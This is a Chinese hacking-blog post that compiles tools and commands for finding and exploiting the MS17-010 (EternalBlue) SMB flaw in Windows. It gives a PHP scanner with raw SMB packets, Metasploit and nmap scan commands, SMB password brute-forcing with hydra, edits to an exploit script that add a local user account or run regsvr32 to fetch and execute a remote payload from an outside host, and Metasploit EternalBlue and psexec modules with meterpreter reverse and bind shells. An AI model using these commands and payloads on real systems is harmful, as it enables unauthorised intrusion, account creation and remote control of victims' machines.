Dragon
  • 一个纯白的黑客网站,一直在努力,apt的路上,更精彩!
lsh4ckLsh4ck  2019-01-31 09:45 来源 |   抢沙发  2,245 
文章评分 0 次,平均分 0.0

扫描脚本汇总

PHP脚本:

<?php
 
//根据巡风python代码翻译成PHP代码
//2017.08.03 by ice && By T00ls.Net;
//https://github.com/ysrc/xunfeng/blob/master/vulscan/vuldb/MS17_010.py
@error_reporting(7);
if(@$_GET['host']){
        $host=trim($_GET['host']);
        if(ms17010($host,445)){
                echo '<span style="color:#F00">[+] Vulnerability!</span>';
        }else{
                echo '<span style="color:#000">[-] No Vulnerability!</span>';
        }
        echo '
[+] OS: <span style="color:#666">'.smbos($host,445)."</span>
";
}
function ms17010($host,$port){
        $tcp='tcp://'.$host.':'.$port;
        $sock=stream_socket_client($tcp,$errno, $errstr, 3,STREAM_CLIENT_CONNECT);
        if ($sock){
                $data1=pack('H*','00000054ff534d42720000000018012800000000000000000000000000002f4b0000c55e003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200');
                fwrite($sock,$data1);
                fread($sock, 1024);
                $data2=pack('H*','00000063ff534d42730000000018012000000000000000000000000000002f4b0000c55e0dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000');
                fwrite($sock,$data2);
                $data2_data=fread($sock, 1024);
                $user_id=substr(bin2hex($data2_data),64,4);
                $data3=pack('H*','000000'.dechex(58+strlen($host)).'ff534d42750000000018012000000000000000000000000000002f4b'.$user_id.'c55e04ff000000000001001a00005c5c'.bin2hex($host).'5c49504324003f3f3f3f3f00');
                fwrite($sock,$data3);
                $data3_data=fread($sock, 1024);
                $allid=substr(bin2hex($data3_data),28*2,16);
                $data4=pack('H*','0000004aff534d422500000000180128000000000000000000000000'.$allid.'1000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00');
                fwrite($sock,$data4);
                $data4_data=fread($sock, 1024);
                if(substr(bin2hex($data4_data),18,8) == '050200c0'){
                        return true;
                }else{
                        return false;
                }
        }
}
function smbos($host,$port){
        $tcp='tcp://'.$host.':'.$port;
        $sock=stream_socket_client($tcp,$errno, $errstr, 3,STREAM_CLIENT_CONNECT);
        if ($sock){
                $payload1=pack('H*','00000085ff534d4272000000001853c80000000000000000000000000000fffe00000000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200');
                $payload2=pack('H*','0000010aff534d4273000000001807c80000000000000000000000000000fffe000040000cff000a01044132000000000000004a0000000000d40000a0cf00604806062b0601050502a03e303ca00e300c060a2b06010401823702020aa22a04284e544c4d5353500001000000078208a2000000000000000000000000000000000502ce0e0000000f00570069006e0064006f0077007300200053006500720076006500720020003200300030003300200033003700390030002000530065007200760069006300650020005000610063006b002000320000000000570069006e0064006f0077007300200053006500720076006500720020003200300030003300200035002e00320000000000');
                fwrite($sock,$payload1);
                $out1=fread($sock, 1024);
                fwrite($sock,$payload2);
                $out2=fread($sock, 1024);
                $blob_len_arr=unpack('s',substr($out2,36+7,2));
                $osarr=explode(chr(0),iconv('UTF-16LE','UTF-8',substr($out2,36+11+$blob_len_arr[1])));
                return $osarr[0].'|'.$osarr[1];
        }
}
?>

批量扫描:

https://github.com/lsh4ck/ms17-010-m4ss-sc4nn3r

MSF的:

use auxiliary/scanner/smb/smb_version
set rhosts x.x.x.0/24
set threads 16
run
use auxiliary/scanner/smb/smb_ms17_010
show options
set threads 16
services -r tcp -p 445 -R
run

或者也可以:

use auxiliary/scanner/smb/smb_ms17_010 
set ShowProgress false 
set ConnectTimeout 5 
set THREADS 16 
set RHOSTS x.x.x.x run

smb_ms17_010.rb缺省只扫445/TCP。如果想扫139/TCP,必须:

set SMBDirect false
set RPORT 139
或者

unset SMBDirect
set RPORT 139

NMAP的:

nmap --script smb-vuln-ms17-010 -p445 x.x.x.x

漏洞利用

worawit/MS17-010

https://github.com/worawit/MS17-010
这个脚本其实在nas放出一个月就公开再Exploit-db了,很多人估计都不知道..
那么,查看zzz_exploit.py脚本会看到 from mysmb import MYSMB 之前有人使用python钓鱼:mysmb,其实真正安装了这个模块的人其实这个脚本反倒会利用失败.并且把信息发送给钓鱼者

依赖项

pipe

经常执行脚本会发现报错.如下所示

$ python zzz_exploit.py 10.10.10.19                                                                 system
Target OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1
Not found accessible named pipe
Done

你可能需要的pipe

netlogon lsarpc samr browser atsvc DAV RPC SERVICE epmapper eventlog InitShutdown keysvc lsass LSM_API_service ntsvcs plugplay protected_storage router SapiServerPipeS-1-5-5-0-70123 scerpc srvsvc tapsrv trkwks W32TIME_ALT wkssvc PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER db2remotecmd ```netlogon lsarpc samr browser atsvc DAV RPC SERVICE epmapper eventlog InitShutdown keysvc lsass LSM_API_service ntsvcs plugplay protected_storage router SapiServerPipeS-1-5-5-0-70123 scerpc srvsvc tapsrv trkwks W32TIME_ALT wkssvc PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER db2remotecmd

那么直接通过 python zzz_exploit.py <ip> [pipe_name] 即可
当然有些时候没有设置username和password,并且共享中启动了密码访问..也会导致这个问题

或者可以通过
auxiliary/scanner/smb/pipe_auditor 模块找寻你需要的pipe

use auxiliary/scanner/smb/pipe_auditor
set rhosts 10.10.10.19
set threads 20
exploit

username and password

USERNAME = ''
PASSWORD = ''
只需要更改系统中存在的共享smb账户,无论权限多低

那么我们怎么找到对应的账户呢,使用如下两种,当然使用自己写python脚本更佳啊

set auxiliary/scanner/smb/smb_login
set rhosts 10.10.10.0-255
set USER_FILE user.txt 
set PSSS_FILE pass.txt 
exploit

hydra -L user.txt -P pass.txt -t 20 10.10.10.10 smb

注意: 此脚本最关键地方

print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)
    
#   smb_send_file(smbConn, sys.argv[0], 'C', '/exp.txt')
    service_exec(conn, r'cmd /c net user test test /add')

如果测试成功,会发现c盘新建了一个pwned.txt文件,同时会执行命令net user test test /add

如果觉得繁琐,可以用powershell/regsvr32等等执行脚本内容

use exploit/multi/script/web_delivery
set target 3
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.19
exploit

regsvr32 /s /n /u /i:http://192.168.2.164:8080/5Msr8HdNh.sct scrobj.dll

在python代码更改成如下即可

service_exec(conn, r'cmd /c regsvr32 /s /n /u /i:http://192.168.2.164:8080/5Msr8HdNh.sct scrobj.dll')

Eternalblue-Doublepulsar-Metasploit

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

修改eternalblue_doublepulsar.rb中成自己的目录,修改完成后,我们将rb文件放到metasploit的目录exploit/windows/smb/

register_options([
    OptEnum.new('TARGETARCHITECTURE', [true,'Target Architecture','x86',['x86','x64']]),
    OptString.new('ETERNALBLUEPATH',[true,'Path directory of Eternalblue','/root/Eternalblue-Doublepulsar-Metasploit/deps/']),
    OptString.new('DOUBLEPULSARPATH',[true,'Path directory of Doublepulsar','/root/Eternalblue-Doublepulsar-Metasploit/deps/']),
    OptString.new('WINEPATH',[true,'WINE drive_c path','/root/.wine/drive_c/']),
    OptString.new('PROCESSINJECT',[true,'Name of process to inject into (Change to lsass.exe for x64)','wlms.exe'])
], self.class)

启动msf后使用reload_all命令重新加载模块

msfvemon -p windows/meterpreter/reverse_tcp lhost=192.168.12.110 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll
 
msfconsole
reload_all
search eternalblue_doublepulsar.rb 
use exploit/windows/smb/eternalblue_doublepulsar 
set RHOST 192.168.56.101
set Payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
exploit

ms17_010_eternalblue

至于防火墙可以通过https和dns的payload走就行了

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/meterpreter/bind_tcp
set rhost x.x.x.x
exploit

ms17_010_psexec

全版本通杀,至于为什么.因为有依赖条件.必须是禁止密码保护共享的

exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhost x.x.x.x
exploit

本文参考此文整理



  

本文转载自来源,本文观点不代表lsh4ck's Blog立场,版权归原作者所有,欢迎分享本文,转载请保留出处!

lsh4ck
Lsh4ck 关注:0    粉丝:7
这个人很懒,什么都没写
×

予人玫瑰,手有余香

打赏 Lsh4ck

打开支付宝扫一扫,即可进行扫码打赏哦

发表评论

表情 链接 私密 格式 签到

扫一扫二维码分享

无觅相关文章插件,快速提升流量